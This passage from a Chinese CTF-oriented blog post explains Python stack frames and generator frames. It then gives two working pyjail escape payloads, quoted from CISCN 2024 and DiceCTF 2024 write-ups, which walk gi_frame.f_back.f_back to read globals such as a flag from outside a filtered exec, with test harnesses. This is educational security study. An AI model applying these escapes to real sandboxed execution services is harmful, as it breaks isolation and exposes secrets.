</span>    <span class="nf">print</span><span class="p">(</span><span class="n">global_frame</span> <span class="o">==</span> <span class="n">multiply_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># True
# True
# Result: 15
</span></pre></td></tr></tbody></table></code></div></div>

<h3 id="生成器的栈帧"><span class="me-2">生成器的栈帧</span><a href="#生成器的栈帧" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>每次调用一个普通函数时，Python 会为该函数创建一个新的栈帧，并将其压入调用栈中。当函数执行完毕后，栈帧会被弹出。生成器的实现也使用到了栈帧，但不同的是，生成器可以暂停执行，并在恢复时继续从暂停的位置执行，也就意味着生成器的栈帧行为有所区别。</p>

<p>下面是一个测试示例：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>

<span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Generator started, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">1</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After first yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">2</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After second yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">3</span>

<span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>

<span class="c1"># 第一次调用 next()，启动生成器
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
# 第二次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
# 第三次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span>
<span class="c1"># Generator started, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 4, code my_generator&gt;
# 1
# After first yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 6, code my_generator&gt;
# 2
# After second yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 8, code my_generator&gt;
# 3
</span></pre></td></tr></tbody></table></code></div></div>
<p>每次调用 next() 时，生成器会从上次暂停的位置继续执行，并且它的栈帧保持不变。这表明，在整个生命周期中，生成器的栈帧一直存在，并且保存着它的状态。</p>

<p>我们可以使用 dir 函数来查看生成器的内容</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre><span class="n">g</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">])</span>
<span class="nf">dir</span><span class="p">(</span><span class="n">g</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__del__',
#  '__delattr__',
#  ... ,
#  'close',
#  'gi_code',
#  'gi_frame',
#  'gi_running',
#  'gi_suspended',
#  'gi_yieldfrom',
#  'send',
#  'throw']
</span><span class="n">g</span><span class="p">.</span><span class="n">gi_frame</span>  <span class="c1"># &lt;frame at 0x102bd4880, file '/code.py', line 1, code &lt;genexpr&gt;&gt;
</span></pre></td></tr></tbody></table></code></div></div>
<p>生成器对象自身也存在一些独有的属性，以 gi_开头:</p>
<ul>
  <li>gi_frame: gi_frame 就是生成器的栈帧，生成器每次执行，栈帧的地址保持不变。</li>
</ul>

<h3 id="生成器栈帧逃逸-payload"><span class="me-2">生成器栈帧逃逸 payload</span><a href="#生成器栈帧逃逸-payload" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>下面是博客 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的一段抽象逻辑：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">&lt;&lt;用户提供的 Python 代码&gt;&gt;</span><span class="sh">"""</span>
<span class="p">...</span> <span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">)</span>
<span class="p">...</span> <span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<p>用户的代码被丢进exec中执行。经过严格的过滤后，import、魔术方法、builtins 等沙箱逃逸的常用思路都会被堵死。这时候想要逃逸到 exec 环境之外拿到flag，甚至是 RCE，就需要通过栈帧回溯来实现。</p>

<h4 id="payload1"><span class="me-2">payload1</span><a href="#payload1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>文章 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的 payload 如下：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="p">[</span><span class="o">*</span><span class="n">q</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="c1"># g 现在是 exec 之外的栈帧的 globals 了
# g 是一个 dict，其中包含 flag 变量
</span></pre></td></tr></tbody></table></code></div></div>
<p>要理解上面的表达式，需要明白：</p>
<ol>
  <li>==生成器在初始化时并不会立即执行==。q 初始化之后并不会立即执行，而是到 [*q] 时才执行。因此乍一眼看有语法问题，q 并没有定义啊？但是当其执行时，q 已经是一个生成器对象了。</li>
  <li>f_back 属性用于访问调用栈中的前一个栈帧。</li>
</ol>

<p>因此：</p>
<ul>
  <li>q.gi_frame 是生成器对象 q 的当前栈帧。</li>
  <li>q.gi_frame.f_back 得到的是 exec 函数的栈帧，</li>
  <li>q.gi_frame.f_back.f_back 得到的就是全局栈帧了。</li>
  <li>q.gi_frame.f_back.f_back.f_globals 得到的就是 globals() 函数的内容。</li>
</ul>

<p>builtins 和 locals 也可以同理拿到。</p>

<p>作者提到为什么非得把 q.gi_frame 写在生成器里面？为什么不能写成下面这样：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span>
</pre></td></tr></tbody></table></code></div></div>

<p>原因在于只有在生成器运行过程中，q.gi_frame.f_back 才不为 None（CPython 中定义的逻辑）。即使 q 已经是一个生成器，但是由于并没有进行解包操作，生成器并没有运行，所以 q.gi_frame.f_back 始终为 None，如果没有解包的话，即使像上面那样写，结果也是 None。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span>
<span class="c1"># None
</span></pre></td></tr></tbody></table></code></div></div>

<p>测试脚本：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">q = (q.gi_frame.f_back.f_back.f_globals for _ in [1]);g = [*q][0];print(g)</span><span class="sh">"""</span>
<span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h4 id="payload2"><span class="me-2">payload2</span><a href="#payload2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p><a href="https://maplebacon.org/2024/02/dicectf2024-irs/">[DiceCTF 2024] IRS</a> 这篇博客也给出了一个生成器栈帧的 payload：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="k">def</span> <span class="nf">f</span><span class="p">():</span>
    <span class="k">global</span> <span class="n">x</span><span class="p">,</span> <span class="n">frame</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span>
    <span class="k">yield</span>
<span class="n">x</span> <span class="o">=</span> <span class="nf">f</span><span class="p">()</span>
<span class="n">x</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="bp">None</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">frame</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>
<p>如何理解这段代码：</p>
<ol>
  <li>首先声明了一个生成器 f，
    <ol>
      <li>f 内部声明了全局变量 x 和 frame，意味着会在函数外部对其进行操作。</li>
    </ol>
  </li>
  <li>x = f() 会实例化一个生成器，但由于生成器的延迟加载，此时生成器不会执行。</li>
  <li>x.send(None)：这行代码启动了生成器，并让它执行到第一个 yield 语句。</li>
</ol>

<p>ps: 文章作者这段 payload 与上面那种 payload 的区别再于没有显示定一个生成器，AST 中不会出现 ast.GeneratorExp。</p>

<p>测试代码如下：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">'''</span><span class="s">
def f():
    global x, frame
    frame = x.gi_frame.f_back.f_back
    yield
x = f()
x.send(None)
print(frame.f_globals)
</span><span class="sh">'''</span>

<span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="csicn-2024-mossfern"><span class="me-2">CSICN 2024 mossfern</span><a href="#csicn-2024-mossfern" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h2 id="参考资料"><span class="me-2">参考资料</span><a href="#参考资料" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<ul>
  <li>
    <div class="table-wrapper"><table>
      <tbody>
        <tr>
          <td>[利用生成器栈帧逃逸 Pyjail</td>
          <td>CISCN 2024 mossfern 题解](https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern)</td>
        </tr>
      </tbody>
    </table></div>
  </li>
</ul>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/python/">Python</a>
      </div>
    
    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/pyjail/"
            class="post-tag no-text-decoration"
          >pyjail</a>
        
      </div>
    
    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
      <a href="https://twitter.com/intent/tweet?text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    
      <a href="https://www.facebook.com/sharer/sharer.php?title=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&u=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    
      <a href="https://t.me/share/url?url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F&text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    
    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>

          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->

  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        <li class="text-truncate lh-lg">
          <a href="/posts/phpggc-thinkphp-%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90/">phpggc thinkphp 利用链分析</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8/">php 反序列化利用</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%A0%BC%E5%BC%8F%E5%9F%BA%E7%A1%80/">php 反序列化格式基础</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%95%E8%BF%87/">php 反序列化绕过</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8/">php 反序列化字符逃逸</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->

              <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

            </div>

  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>

          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->

<!-- An random integer that bigger than 0 -->

<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->

  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/QWB-2023-writeup/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1702981788"
  data-df="ll"
  
>
  Dec 19, 2023
</time>

              <h4 class="pt-0 my-2">QWB 2023 Writeup</h4>
              <div class="text-muted">
                <p>WEB
happygame
题目提供了一个 gRPC 服务。gRPC 是一个由 Google 初始开发的高性能、开源的远程过程调用（RPC）框架。网上已有不少针对 gRPC 的安全研究：

  【Black Hat Asia 2021系列分享】自动化挖掘 gRPC 网络接口漏洞
  gRPC内存马研究与查杀 - 先知社区

gRPC 框架如下所示：

可见服务端由 Java 编写。

针...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-04-%E7%BB%95%E8%BF%87%E5%A4%9A%E8%A1%8C%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-04 绕过多行限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过多行限制
绕过多行限制的利用手法通常在限制了单行代...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-03-%E7%BB%95%E8%BF%87%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-03 绕过命名空间限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过命名空间限制

部分限制
有些沙箱在构建时使用 e...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->

              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
    <a
      href="/posts/pyjail-bypass-10-%E7%BB%95%E8%BF%87-opcode-%E6%B2%99%E7%AE%B1/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>pyjail bypass-10 绕过 opcode 沙箱</p>
    </a>
  
    <a
      href="/posts/TPCTF-2025-web-writeup/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>TPCTF 2025 Web Writeup</p>
    </a>
  
</nav>

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

      <a href="https://twitter.com/DummyKitty">DummyKitty</a>.
    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    <!-- Embedded scripts -->

      <!-- The comments switcher -->

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->

<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
